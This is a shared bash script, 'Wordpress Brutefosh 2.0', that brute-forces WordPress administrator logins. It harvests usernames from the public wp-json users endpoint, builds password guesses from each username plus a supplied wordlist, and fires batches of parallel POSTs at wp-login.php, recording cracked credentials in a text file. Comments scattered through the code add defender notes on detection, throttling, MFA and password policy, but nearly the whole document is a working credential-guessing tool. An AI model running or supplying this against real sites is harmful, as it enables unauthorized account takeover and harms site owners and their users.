
[BASH] Wordpress Brutefosh 2.0 - Auto Generate Password

zerobyte-id Mar 29th, 2019 (edited) 252 Never
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 2.0
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-29
  8.  
  # Request pacing shared by every curl call in this script: connect time and
  # total time are both capped at curl_timeout seconds, and the login loops
  # start at most multithread_limit attempts before waiting for the batch.
  # Detection note: on the target this appears as bursts of up to
  # multithread_limit near-simultaneous POSTs to wp-login.php from one client.
  9. #----------- CONFIGURATION -----------
  10. curl_timeout=20
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
  # Drop a username list left in the working directory by an earlier run, so
  # the later "-f wpusername.tmp" test reflects this run only.
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
  18.  
  # ANSI colour escapes for the status lines: red, green, yellow, reset.
  19. RED='\e[31m'
  20. GRN='\e[32m'
  21. YEL='\e[33m'
  22. CLR='\e[0m'
  23.  
  # _GetUserWPJSON TARGET
  # Requests TARGET/wp-json/wp/v2/users without credentials and extracts every
  # "slug" value from the response with grep. Each slug is printed and appended
  # to wpusername.tmp in the current directory; when nothing matches, only an
  # INFO line is printed and wpusername.tmp is not written.
  # Target, UsernameLists and Username are assigned without `local`, so they
  # are script-wide globals.
  # Defender note: this step only yields names when the site returns the users
  # collection to unauthenticated requests. Restricting that route, and alerting
  # on anonymous GETs to /wp-json/wp/v2/users that are followed by wp-login.php
  # POSTs from the same client, covers it.
  24. function _GetUserWPJSON() {
  25.     Target="${1}";
  26.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  27.     echo ""
  28.     if [[ -z ${UsernameLists} ]];
  29.     then
  30.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  31.     else
           # Truncate the list file, then rely on word splitting of the grep
           # output to write one slug per line.
  32.         echo -ne > wpusername.tmp
  33.         for Username in ${UsernameLists};
  34.         do
  35.             echo "INFO: Found username \"${Username}\"..."
  36.             echo "${Username}" >> wpusername.tmp
  37.         done
  38.     fi
  39. }
  40.  
  # _TestLogin TARGET USERNAME PASSWORD
  # Sends one form POST (log, pwd, wp-submit) to TARGET/wp-login.php and
  # classifies the reply: a response containing both "login_error" and "div"
  # is reported as invalid, a 302 status is reported as a hit and appended to
  # wpbf-results.txt, anything else is reported as invalid.
  # Target, Username, Password and LetsTry are globals (no `local`).
  # Defender note: no user-agent, cookie or referer option is passed to curl,
  # so each attempt is a cookieless POST carrying curl's default User-Agent.
  # That is a cheap signature for WAF or log rules, alongside per-account and
  # per-source login throttling and MFA on administrator accounts.
  # Forensics note: matched credentials are kept in plain text in
  # wpbf-results.txt in the working directory.
  41. function _TestLogin() {
  42.     Target="${1}"
  43.     Username="${2}"
  44.     Password="${3}"
       # -w appends a marker line holding the HTTP status so it can be read
       # back out of the captured response text.
  45.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
       # The unquoted echo joins the response into a single line, so both greps
       # test the response as a whole.
  46.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  47.     then
  48.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  49.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  50.     then
  51.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
  52.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  53.     else
  54.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  55.     fi
  56. }
  57.  
  # PasswdGenerator WORD
  # Prints one candidate password per line, all derived from WORD (the callers
  # in this script pass the account name): WORD as is, upper-cased, with "123",
  # with "admin", doubled, and with the first letter capitalised, then numeric
  # suffixes 1-99, 01-09 and every year from 1900 to the current year, for both
  # the plain and the capitalised form.
  # WORD, foo and c are globals (no `local`).
  # Defender note: every candidate contains the username itself, in some
  # letter case, so a password policy that rejects passwords containing the
  # account name case-insensitively covers the whole generated list, whatever
  # the suffix.
  58. function PasswdGenerator() {
  59.     WORD="${1}"
  60.     echo "${WORD}"
  61.     echo "${WORD}" | tr a-z A-Z
  62.     echo "${WORD}123"
  63.     echo "${WORD}123" | tr a-z A-Z
  64.     echo "${WORD}admin"
  65.     echo "${WORD}${WORD}"
  66.     echo "${WORD}${WORD}123"
  67.     echo "${WORD}${WORD}" | tr a-z A-Z
  68.     echo "${WORD}${WORD}123" | tr a-z A-Z
       # ${WORD:0} copies WORD from offset 0 (the whole string); ${foo^}
       # upper-cases its first character.
  69.     foo=${WORD:0};echo ${foo^}
  70.     foo=${WORD:0};echo ${foo^}123
       # Plain form with numeric suffixes: 1-99, 01-09, then years.
  71.     for ((c=1;c<=99;c++))
  72.     do
  73.         echo "${WORD}${c}"
  74.     done
  75.     for ((c=1;c<=9;c++))
  76.     do
  77.         echo "${WORD}0${c}"
  78.     done
  79.     for ((c=1900;c<=$(date +%Y);c++))
  80.     do
  81.         echo "${WORD}${c}"
  82.     done
       # Same three suffix ranges for the capitalised form.
  83.     for ((c=1;c<=99;c++))
  84.     do
  85.         foo=${WORD:0};echo ${foo^}${c}
  86.     done
  87.     for ((c=1;c<=9;c++))
  88.     do
  89.         foo=${WORD:0};echo ${foo^}0${c}
  90.     done
  91.     for ((c=1900;c<=$(date +%Y);c++))
  92.     do
  93.         foo=${WORD:0};echo ${foo^}${c}
  94.     done
  95. }
  96.  
  # Banner, then the two interactive prompts (target URL and wordlist path).
  97. echo ' _    _               _                         '
  98. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  99. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  100. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  101. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  102. echo '                       |_|.::Brutefo(sh) 2019::.'
  103. echo ''
  104.  
  105. echo -ne "[?] Input website target : "
  106. read Target
  107.  
  # Fetch the login page once and require the "wp-submit" marker before going
  # on. The copy is saved as wplogin.tmp in the working directory and is not
  # removed anywhere in this listing, so it remains as an on-disk artifact.
  108. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  109. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  110. then
  111.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
  112.     exit
  113. fi
  114.  
  115. echo -ne "[?] Input password lists in (file) : "
  116. read PasswordLists
  117.  
  # A missing wordlist is not fatal: the path is replaced by /dev/null, so the
  # later `cat ${PasswordLists}` adds nothing and only the username-derived
  # candidates are used.
  118. if [[ ! -f ${PasswordLists} ]]
  119. then
  120.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
  121.     PasswordLists=/dev/null
  122. fi
  123.  
  # Main flow: enumerate usernames, then for each one build a candidate file
  # (generated candidates first, the supplied wordlist after) and submit every
  # entry through _TestLogin. If enumeration wrote no wpusername.tmp, a single
  # username is read from the prompt and handled the same way.
  # Working files use fixed names in the current directory:
  # wpbf-passwords.lst.tmp is truncated and removed at the end, while
  # wpbf-results.txt is only ever appended to and persists across runs.
  # Defender note: each account receives the full candidate list in quick
  # succession, so a run of failed logins against one username within a short
  # window, repeated per enumerated author, is the pattern that account
  # lockout or login throttling should catch.
  124. _GetUserWPJSON ${Target}
  125.  
  126. if [[ -f wpusername.tmp ]]
  127. then
  128.     for User in $(cat wpusername.tmp)
  129.     do
  130.         echo "INFO: Generate password from ${User}..."
  131.         echo -ne "" > wpbf-passwords.lst.tmp
  132.         PasswdGenerator ${User} >> wpbf-passwords.lst.tmp
  133.         cat ${PasswordLists} >> wpbf-passwords.lst.tmp
  134.         (
  135.             for Pass in $(cat wpbf-passwords.lst.tmp)
  136.             do
                   # cthread wraps at multithread_limit; each time it wraps the
                   # loop waits for all background jobs, so no more than
                   # multithread_limit attempts are in flight at once.
  137.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  138.                 _TestLogin ${Target} ${User} ${Pass} &
  139.             done
  140.             wait
  141.         )
  142.     done
  143.     echo -ne "" > wpbf-passwords.lst.tmp
  144.     rm wpbf-passwords.lst.tmp
  145. else
  146.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  147.     echo -ne "[?] Input username manually : "
  148.     read User
  149.     if [[ -z ${User} ]]
  150.     then
  151.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  152.         exit
  153.     fi
  154.     echo "INFO: Generate password from ${User}..."
  155.     echo -ne "" > wpbf-passwords.lst.tmp
  156.     PasswdGenerator ${User} >> wpbf-passwords.lst.tmp
  157.     cat ${PasswordLists} >> wpbf-passwords.lst.tmp
  158.     (
  159.         for Pass in $(cat wpbf-passwords.lst.tmp)
  160.         do
               # Same batching as the enumerated-user branch above.
  161.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  162.             _TestLogin ${Target} ${User} ${Pass} &
  163.         done
  164.         wait
  165.     )
  166.     echo -ne "" > wpbf-passwords.lst.tmp
  167.     rm wpbf-passwords.lst.tmp
  168. fi
  # Summary: counts the distinct lines of wpbf-results.txt that match the
  # target string, so entries kept from earlier runs against the same target
  # are included in the figure.
  169. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"